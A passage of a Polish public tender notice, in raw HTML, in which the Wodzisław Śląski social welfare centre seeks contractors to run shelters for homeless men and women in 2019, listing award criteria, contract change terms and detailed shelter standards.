id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Odległosć schroniska (miejsca wykonania usługi) od siedziby Zamawiającego</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"> 1) Ogólne i szczegółowe warunki umowy, które uwzględnione będą w przyszłej umowie z wybranym w wyniku przetargu wykonawcą zamieszczone są we wzorze umowy - załącznik do SIWZ 2) Przyjmuje się, że zapisy wzoru umowy nie zakwestionowane przed złożeniem oferty zostaną przyjęte przez Wykonawcę bez zastrzeżeń. Wszelkie pytania i wątpliwości dotyczące wzoru umowy, będą rozpatrywane jak dla całej specyfikacji, zgodnie z art. 38 ustawy Prawo zamówień publicznych. 3) Wszelkie zmiany w treści umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności. 4) Na podstawie art. 144 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych strony mogą dokonać zmiany treści umowy w formie aneksu, w szczególności w następujących sytuacjach: a) zmiana terminu realizacji zamówienia w przypadku zaistnienia okoliczności lub zdarzeń uniemożliwiających realizację umowy w wyznaczonym terminie, na które strony niniejszej umowy nie miały wpływub) zmiany w zakresie podatku VAT; jeżeli w trakcie obowiązywania umowy nastąpi zmiana w zakresie podatku VAT, Zamawiający zobowiązuje się do uiszczania stawek wynagrodzenia powiększonych o podatek od towarów i usług według obowiązującej stawki,c) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć - działania siły wyższej, 5) Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego),b) zmiana danych teleadresowych,c) zmiana osób wskazanych do kontaktów między Stronami,d) wzrost wartości umowy wynikający z konieczności skierowania do schroniska większej liczby osób bezdomnych niż zostało wskazane w opisie przedmiotu zamówienia, czego nie można było wcześniej przewidzieć.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-02-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest świadczenie usług schronienia tj. udzielenie tymczasowego schronienia dla bezdomnych mężczyzn, w okresie od 1 marca 2019 roku do dnia 31 grudnia 2019 roku, w lokalu będącym w wyłącznej i swobodnej dyspozycji Wykonawcy z zapewnieniem niezbędnych warunków socjalnych. Zamawiający przewiduje, że prognozowana średnia liczba skierowanych w ciągu roku bezdomnych mężczyzn wynosić będzie 12 osób. Liczba ta może ulec zwiększeniu bądź zmniejszeniu.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający przewiduje, że prognozowana średnia liczba skierowanych w ciągu roku bezdomnych mężczyzn wynosić będzie 12 osób.Liczba ta może ulec zwiększeniu bądź zmniejszeniu.Zamówienie nie obejmuje zapewnienia wyżywienia osobom bezdomnym.2. Schronisko dla bezdomnych świadczy usługi całodobowo, przez 7 dni w tygodniu.3. Wykonawca zobowiązany jest do:1/. Umożliwienia spożycia posiłku oraz dostęp do pomieszczenia kuchennego umożliwiającego samodzielne przygotowanie posiłku i gorącego napoju, wyposażonego w co najmniej jedną lodówkę oraz szafki kuchenne.- pomieszczenie do spożywania posiłków poza porami posiłków może pełnić funkcję świetlicy lub sali spotkań grupowych. 2/. Umożliwienia stałego dostępu do bieżącej ciepłej i zimnej wody gwarantującej możliwość przeprowadzenia zabiegów higienicznych:a). urządzenie natryskowe - 1 dla 15 osób, b). miska ustępowa - 1 dla 20 mężczyzn, c). pisuar - 1 dla 20 mężczyzn,d). umywalka - 1 dla 5 osób,e). zapewnienie mieszkańcom podstawowych środków czystości tj. mydło, szampon, proszek do prania, papier toaletowy, ręczniki itp.3/. Umożliwienia prania i suszenia odzieży tj. zapewnienie pomieszczenia na pralnię i suszarnię wyposażonego w co najmniej jedną pralkę na 30 osób. W przypadku gdy schronisko nie posiada suszarni zapewnia dostęp do co najmniej jednej suszarki elektrycznej na 30 osób. 4/. Zapewnienia wymianę odzieży (odpowiedniej do pory roku) lub dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany.5/. Zapewnienia informacji o dostępnych formach pomocy, a w razie potrzeby pomocy w jej zorganizowaniu.6/. Zapewnienia usług aktywizacyjnych ukierunkowanych na wzmacnianie aktywności społecznej, uzyskanie samodzielności życiowej i wyjście z bezdomności.a). Wzmacnianie aktywności społecznej może by realizowane m.in. przez :- trening umiejętności samodzielnego wypełniania ról społecznych,- trening umiejętności interpersonalnych i umiejętności rozwiązywania problemów,- uczestnictwo w grupach wsparcia.b). Uzyskanie samodzielności życiowej i wyjście z bezdomności może być realizowane m.in. przez:- zajęcia przygotowujące do podjęcia zatrudnienia,- trening zagospodarowania własnym budżetem,- trening prowadzenia gospodarstwa domowego,- uczestnictwo w zajęciach centrum lub klubu integracji społecznej.7/. Zapewnienia opieki przez co najmniej 1 opiekuna na nie więcej niż 50 osób przebywającychw schronisku.8/. Zatrudnienia co najmniej 1 pracownika socjalnego na nie więcej niż 50 osób przebywającychw schronisku.9/. Zapewnienia w porze nocnej opieki przez co najmniej 1 opiekuna.10/. Zapewnienia całodobowego dostępu do schroniska.11/. Zapewnienia standardów obiektu, w którym będzie prowadzone schronisko zgodniez Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 rokuw sprawie minimalnych standardów noclegowni, schroniska dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni, tj. m.in.:a). zapewnienie miejsca w jednym pomieszczeniu dla nie więcej niż 10 osób,b). zapewnienie powierzchni przypadającej na osobę w pomieszczeniu nie mniej niż 4m2/osobę,w pomieszczeniach z łóżkami piętrowymi nie mniej niż 3 m2/osobę.c). zapewnienia w pomieszczeniach mieszkalnych co najmniej 1 okna, swobodnego dostępu do łóżek wyposażonych w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc) oraz dostępu do szaf.d). zapewnienie wydzielonego pomieszczenia do:- prac biurowych- na środki czystości i higieny- do spotkań indywidualnyche). zapewnienia wydzielonego pomieszczenia lub jego części, wyposażonego w komputer z dostępem do internetu.12/. Zapewnienie podstawowych medykamentów, tj. środków opatrunkowych, itp.13. Prowadzenia dokumentacji osób przebywających w schronisku umożliwiającej ich identyfikację, zakres udzielonej pomocy i okres pobytu.14/. Prowadzenia sprawozdawczości zgodnie z obowiązującymi wymaganiami zawartymiw Gminnym Programie Wychodzenia z Bezdomności i Przeciwdziałania Wykluczeniu Społecznemu dla Miasta Wodzisławia Śląskiego w kontekście wskaźników niniejszego programu. 15/.Współpracy z pracownikami socjalnymi Miejskiego Ośrodka Pomocy Społecznejw Wodzisławiu Śląskim, Policją, Strażą Miejską, służbą zdrowia, organizacjami pozarządowymi.16/. Realizacji zamówienia na podstawie decyzji administracyjnej Miejskiego Ośrodka Pomocy Społecznej w Wodzisławiu Śląskim wydanej dla każdego bezdomnego indywidualnie, poprzedzonej wydanym skierowaniem.a). Zamawiający po wydaniu skierowania przekaże Wykonawcy telefonicznie lub pisemnie informację o osobie kierowanej.17/. Niezwłocznego poinformowania w formie pisemnej Miejskiego Ośrodka Pomocy Społecznejw Wodzisławiu Śląskim o niezgłoszeniu się, nieprzebywaniu Klienta w schronisku przez okres dłuższy niż kolejne dwa dni. 18/. Pisemnego lub telefonicznego poinformowania Miejskiego Ośrodka Pomocy Społecznej o sytuacji wydalenia Klienta z placówki z podaniem przyczyny, w terminie nie dłuższym niż dwa dni od dnia zdarzenia. 19/. Niezwłocznego (w momencie zdarzenia), pisemnego i telefonicznego poinformowania Zamawiającego o przyjęciu osoby bezdomnej bez skierowania wraz z podaniem przyczyny. W przypadku braku możliwości przekazania informacji ze względu na czas pracy Zamawiającego, informację należy przekazać w pierwszym najbliższym dniu pracy Zamawiającego. 20/. Zapewnienia właściwego nadzoru kadry, gwarantującego bezpieczeństwo osób korzystających ze schronienia oraz przestrzeganie regulaminu placówki,21/. Utrzymanie w stałej gotowości (kadrowej, rzeczowej i technicznej) miejsc noclegowych.22/. Stałej współpracy z Zamawiającym, w szczególności przy realizacji Indywidualnych programów wychodzenia z bezdomności, kontraktów socjalnych i innych działań mających na celu wspieranie osób przebywających w placówce.4. Wykonawca nie może odmówić przyjęcia osoby bezdomnej, nie będącej pod wpływem alkoholuw okresie trwania niskich temperatur, chyba że przepisy stanowią inaczej.5. Osoby bezdomne skierowane przez Zamawiającego, mogą przebywać w placówce przez całą dobę.6. Zamawiający zastrzega sobie prawo do bieżącego sprawowania nadzoru nad realizacją przedmiotu zamówienia bez wcześniejszego uzgadniania terminu, przez upoważnionego do tego pracownika Zamawiającego, a w szczególności do:a) kontroli dokumentacji przebywających w placówce osób bezdomnych skierowanych przez Zamawiającego,b) kontroli warunków socjalno - bytowych osób bezdomnych skierowanych przez Zamawiającego,c) merytorycznej kontroli prowadzonej pracy socjalnej z bezdomnymi skierowanymi przez Zamawiającego.7. Zamawiający zobowiązuje się do pokrywania kosztów pobytu osób skierowanych wyłącznie za czas rzeczywistego przebywania w placówce.8. Zamawiający pokryje koszt pobytu w schronisku za osobę skierowaną po otrzymaniu od Wykonawcy specyfikacji za miesiąc poprzedni w której Wykonawca zawrze:- imię i nazwisko osoby skierowanej- czasookres pobytu osoby skierowanej- ogólną kwotę poniesionego kosztu miesięcznego za pobyt osób skierowanych przez Zamawiającego.1/ Do specyfikacji Wykonawca zobowiązany jest dołączyć rachunek / fakturę, wraz z kopią listy obecności potwierdzonej za zgodność z oryginałem, którą przekazuje Zamawiającemu po upływie każdego miesiąca kalendarzowego, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę.2/ W przypadku gdy skierowana przez Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim osoba bezdomna posiada własny dochód, wówczas Zamawiający przekaże w odrębnym piśmie do Wykonawcy informację o wysokości procentowej odpłatności za pobyt w schronisku, ustalonejw drodze decyzji administracyjnej wskazanej osobie bezdomnej. Wówczas osoba bezdomna posiadająca własny dochód należną kwotę odpłatności wpłaci na konto lub do kasy Wykonawcy,w nieprzekraczalnym terminie tj. do 5 dnia kolejnego miesiąca. W takim wypadku Zamawiający pokrywa różnicę pomiędzy ustalonym kosztem pobytu a kwotą dokonanej wpłaty. W przypadku braku powyższej wpłaty Wykonawca przedłoży rachunek/fakturę, uwzględniając całkowity koszt pobytu osoby bezdomnej, wraz z kopią listy obecności potwierdzonej za zgodność z oryginałem oraz pisemną informacją o braku wpłaty osoby zobowiązanej, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85311000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Odległość schroniska(miejsca wykonania usługi) od siedziby Zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest świadczenie usług schronienia tj. udzielenie tymczasowego schronienia dla bezdomnych kobiet w okresie od 1 marca 2019 do dnia 31 grudnia 2019 roku w lokalu będącym w wyłącznej i swobodnej dyspozycji Wykonawcy z zapewnieniem niezbędnych warunków socjalnych .</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający przewiduje, że prognozowana średnia liczba skierowanych w ciągu roku bezdomnych kobiet wynosić będzie 2 osoby.Liczba ta może ulec zwiększeniu bądź zmniejszeniu.Zamówienie nie obejmuje zapewnienia wyżywienia osobom bezdomnym.2. Schronisko dla bezdomnych świadczy usługi całodobowo, przez 7 dni w tygodniu.3. Wykonawca zobowiązany jest do:1/. Umożliwienia spożycia posiłku oraz dostęp do pomieszczenia kuchennego umożliwiającego samodzielne przygotowanie posiłku i gorącego napoju, wyposażonego w co najmniej jedną lodówkę oraz szafki kuchenne.- pomieszczenie do spożywania posiłków poza porami posiłków może pełnić funkcję świetlicy lub sali spotkań grupowych. 2/. Umożliwienia stałego dostępu do bieżącej ciepłej i zimnej wody gwarantującej możliwość przeprowadzenia zabiegów higienicznych:a). urządzenie natryskowe - 1 dla 15 osób, b). miska ustępowa - 1 dla 10 kobiet, c). umywalka - 1 dla 5 osób,d).zapewnienie mieszkańcom podstawowych środków czystości tj. mydło, szampon, proszek do prania, papier toaletowy, ręczniki itp.3/. Umożliwienia prania i suszenia odzieży tj. zapewnienie pomieszczenia na pralnię i suszarnię wyposażonego w co najmniej jedną pralkę na 30 osób. W przypadku gdy schronisko nie posiada suszarni zapewnia dostęp do co najmniej jednej suszarki elektrycznej na 30 osób. 4/.Zapewnienia wymianę odzieży (odpowiedniej do pory roku) lub dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany.5/. Zapewnienia informacji o dostępnych formach pomocy, a w razie potrzeby pomocy w jej zorganizowaniu.6/. Zapewnienia usług aktywizacyjnych ukierunkowanych na wzmacnianie aktywności społecznej, uzyskanie samodzielności życiowej i wyjście z bezdomności.a). Wzmacnianie aktywności społecznej może by realizowane m.in. przez :- trening umiejętności samodzielnego wypełniania ról społecznych,- trening umiejętności interpersonalnych i umiejętności rozwiązywania problemów,- uczestnictwo w grupach wsparcia.b). Uzyskanie samodzielności życiowej i wyjście z bezdomności może być realizowane m.in. przez:- zajęcia przygotowujące do podjęcia zatrudnienia,- trening zagospodarowania własnym budżetem,- trening prowadzenia gospodarstwa domowego,- uczestnictwo w zajęciach centrum lub klubu integracji społecznej.7/. Zapewnienia opieki przez co najmniej 1 opiekuna na nie więcej niż 50 osób przebywającychw schronisku.8/. Zatrudnienia co najmniej 1 pracownika socjalnego na nie więcej niż 50 osób przebywającychw schronisku.9/. Zapewnienia w porze nocnej opieki przez co najmniej 1 opiekuna.10/. Zapewnienia całodobowego dostępu do schroniska.11/. Zapewnienia standardów obiektu, w którym będzie prowadzone schronisko zgodniez Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 rokuw sprawie minimalnych standardów noclegowni, schroniska dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni, tj. m.in.:a). zapewnienie miejsca w jednym pomieszczeniu dla nie więcej niż 10 osób,b). zapewnienie powierzchni przypadającej na osobę w pomieszczeniu nie mniej niż 4m2/osobę,w pomieszczeniach z łóżkami piętrowymi nie mniej niż 3 m2/osobę.c). zapewnienia w pomieszczeniach mieszkalnych co najmniej 1 okna, swobodnego dostępu do łóżek wyposażonych w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc) oraz dostępu do szaf.d). zapewnienie wydzielonego pomieszczenia do:- prac biurowych- na środki czystości i higieny- do spotkań indywidualnyche). zapewnienia wydzielonego pomieszczenia lub jego części, wyposażonego w komputer z dostępem do internetu.12/. Zapewnienie podstawowych medykamentów, tj. środków opatrunkowych, podstawowych itp..13.Prowadzenia dokumentacji osób przebywających w schronisku umożliwiającej ich identyfikację, zakres udzielonej pomocy i okres pobytu.14/. Prowadzenia sprawozdawczości zgodnie z obowiązującymi wymaganiami zawartymiw Gminnym Programie Wychodzenia z Bezdomności i Przeciwdziałania Wykluczeniu Społecznemu dla Miasta Wodzisławia Śląskiego w mieście w kontekście wskaźników niniejszego programu. 15/.Współpracy z pracownikami socjalnymi Miejskiego Ośrodka Pomocy Społecznejw Wodzisławiu Śląskim, Policją, Strażą Miejską, służbą zdrowia, organizacjami pozarządowymi.16/. Realizacji zamówienia na podstawie decyzji administracyjnej Miejskiego Ośrodka Pomocy Społecznej w Wodzisławiu Śląskim wydanej dla każdego bezdomnego indywidualnie, poprzedzonej wydanym skierowaniem.a). Zamawiający po wydaniu skierowania przekaże Wykonawcy telefonicznie lub pisemnie informację o osobie kierowanej.17/. Niezwłocznego poinformowania w formie pisemnej Miejskiego Ośrodka Pomocy Społecznej w Wodzisławiu Śląskim o niezgłoszeniu się, nieprzebywaniu Klienta w schronisku przez okres dłuższy niż kolejne dwa dni. 18/. Pisemnego lub telefonicznego poinformowania Miejskiego Ośrodka Pomocy Społecznejo sytuacji wydalenia Klienta z placówki z podaniem przyczyny, w terminie nie dłuższym niż dwa dni od dnia zdarzenia. 19/. Niezwłocznego (w momencie zdarzenia), pisemnego i telefonicznego poinformowania Zamawiającego o przyjęciu osoby bezdomnej bez skierowania wraz z podaniem przyczyny.W przypadku braku możliwości przekazania informacji ze względu na czas pracy Zamawiającego, informację należy przekazać w pierwszym najbliższym dniu pracy Zamawiającego. 20/. Zapewnienia właściwego nadzoru kadry, gwarantującego bezpieczeństwo osób 